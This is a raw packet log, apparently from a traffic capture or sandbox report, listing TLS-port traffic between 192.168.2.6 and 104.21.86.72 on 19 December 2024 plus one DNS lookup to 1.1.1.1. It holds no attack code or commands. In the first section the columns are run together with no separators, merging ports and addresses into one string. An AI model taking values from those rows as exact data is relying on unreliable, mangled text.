                                                              Dec 19, 2024 07:52:17.067298889 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.067333937 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.067370892 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.075263023 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.075306892 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.075359106 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.075373888 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.075429916 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.085009098 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.085052967 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.085151911 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.085166931 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.085199118 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.122833967 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.122878075 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.123019934 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.123038054 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.123086929 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.123110056 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.129416943 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.129466057 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.129560947 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.129579067 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.129638910 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.129653931 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.129713058 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.130536079 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.130676985 CET44349731104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:17.130738974 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:17.135097027 CET49731443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:53.817687988 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:53.817723989 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:53.817804098 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:53.832241058 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:53.832252026 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.049892902 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.050232887 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.109009027 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.109031916 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.110011101 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.110934973 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.123935938 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.171333075 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719168901 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719250917 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719300985 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719324112 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.719338894 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719357014 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.719398022 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719424963 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.719433069 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.719521999 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.727300882 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.730859041 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.730866909 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.731003046 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.735699892 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.738929033 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.738935947 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.739145994 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.744036913 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.746891022 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.746897936 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.747076035 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.838835001 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.838942051 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.910793066 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.910856009 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.914865017 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.914987087 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.916488886 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.916569948 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.924864054 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.924943924 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.924956083 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.925051928 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.933223009 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.933290958 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.933320045 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.933386087 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.941569090 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.941669941 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.941679001 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.941741943 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.949978113 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.950030088 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.958395958 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.958456993 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.958491087 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.958620071 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.958627939 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.958803892 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.966669083 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.966726065 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.966758013 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.966890097 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.974999905 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.975105047 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.983429909 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.983560085 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.983572960 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.983653069 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.990459919 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.990546942 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.990560055 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.990731001 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.997421026 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.997500896 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:55.997514009 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:55.997663975 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.004450083 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.004610062 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.004626036 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.004745007 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.030352116 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.030510902 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.102629900 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.102945089 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.104578018 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.104669094 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.104681015 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.104737997 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.111593008 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.113076925 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.118691921 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.118804932 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.128061056 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.128138065 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.132469893 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.134888887 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.136957884 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.137078047 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.145729065 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.145811081 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.154160976 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.154309988 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.158556938 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.158612967 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.164549112 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.164616108 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.170408964 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.170480013 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.176381111 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.176465034 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.179593086 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.179673910 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.185386896 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.185472965 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.191437006 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.191531897 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.194578886 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.194696903 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.223351955 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.223683119 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.296463013 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.296607018 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.300888062 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.300983906 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.306391954 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.306472063 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.308976889 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.309050083 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.313977957 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.314073086 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.318676949 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.318759918 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.321171045 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.321248055 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.325586081 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.325648069 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.330077887 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.330178022 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.332434893 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.332566977 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.336980104 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.337090969 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.341315985 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.341377020 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.343652964 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.343772888 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.348283052 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.348371029 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.351383924 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.351453066 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.353104115 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.353172064 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.356343031 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.356414080 CET49820443192.168.2.6104.21.86.72
                                                              Dec 19, 2024 07:52:56.359550953 CET44349820104.21.86.72192.168.2.6
                                                              Dec 19, 2024 07:52:56.359627962 CET49820443192.168.2.6104.21.86.72
Dec 19, 2024 07:52:56.362826109 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.362909079 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.364553928 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.364644051 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.367695093 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.367753983 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.371200085 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.371330976 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.371345043 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.371426105 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.372740984 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.372834921 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.375914097 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.375979900 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.486756086 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.486804008 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.486839056 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.486852884 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.486871958 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.486922979 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.486923933 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.486933947 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.486993074 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.494884014 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.494957924 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.494987011 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.494996071 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.495037079 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.495037079 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.503757954 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.503807068 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.503870010 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.503870010 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.503880978 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.504856110 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.504863977 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.504925966 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.512150049 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.512200117 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.512284994 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.512284994 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.512301922 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.513001919 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.520606041 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.520673037 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.520750999 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.520750999 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.520761967 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.520831108 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.528585911 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.528635025 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.528709888 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.528717995 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.528728008 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.528950930 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.535793066 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.535823107 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.535885096 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.535896063 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.536006927 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.536547899 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.542473078 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.542521000 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.542573929 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.542582989 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.542637110 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.542637110 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.679241896 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.679301977 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.679352045 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.679371119 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.679452896 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.679482937 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.685128927 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.685158014 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.685252905 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.685252905 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.685261965 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.685311079 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.690376043 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.690392017 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.690459967 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.690471888 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.690485001 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.690516949 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.696415901 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.696432114 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.696489096 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.696506977 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.696614027 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.697335005 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.702486992 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.702503920 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.702595949 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.702595949 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.702604055 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.702692986 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.708190918 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.708208084 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.708252907 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.708264112 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.708313942 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.708313942 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.714332104 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.714350939 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.714411020 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.714421988 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.714463949 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.714492083 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.719713926 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.719731092 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.719811916 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.719811916 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.719822884 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.719866991 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.871035099 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.871058941 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.871253967 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.871270895 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.871335983 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.871959925 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.872040987 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Dec 19, 2024 07:52:56.872081041 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.872117043 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.980910063 CET | 49820 | 443 | 192.168.2.6 | 104.21.86.72
Dec 19, 2024 07:52:56.980940104 CET | 443 | 49820 | 104.21.86.72 | 192.168.2.6
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 19, 2024 07:52:13.939084053 CET | 55510 | 53 | 192.168.2.6 | 1.1.1.1
Dec 19, 2024 07:52:14.250530005 CET | 53 | 55510 | 1.1.1.1 | 192.168.2.6

